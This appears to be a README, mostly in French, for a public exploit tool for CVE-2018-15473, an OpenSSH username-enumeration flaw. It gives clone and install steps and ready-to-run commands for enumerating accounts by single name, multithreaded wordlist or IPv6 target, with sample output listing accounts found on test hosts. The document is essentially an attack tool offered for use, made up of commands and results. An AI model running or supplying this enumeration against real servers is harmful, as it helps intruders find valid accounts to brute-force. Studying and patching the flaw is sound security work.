
Énumération de noms d'utilisateur multithreadée, compatible IPv6, par wordlists ou pour un utilisateur unique via CVE-2018-15473
OpenSSH jusqu'à la version 7.7 est sujet à une vulnérabilité d'énumération d'utilisateurs car il ne retarde pas l'abandon de l'authentification pour un utilisateur invalide jusqu'à ce que le paquet contenant la requête ait été entièrement analysé, en lien avec auth2-gss.c, auth2-hostbased.c et auth2-pubkey.c.
Vous devrez peut-être installer le paquet équivalent openssl-dev de votre distribution
# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - OR -
pipenv install -r requirements.txt # if you're cool like that
chmod u+x ssh-username-enum.py
Un nom d'utilisateur unique
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!
Utilisez une wordlist avec 10 threads (la valeur par défaut est 4)
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------
Adresse IPv6 sur le port 2222 et VERBOSITÉ ACCRUE !
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------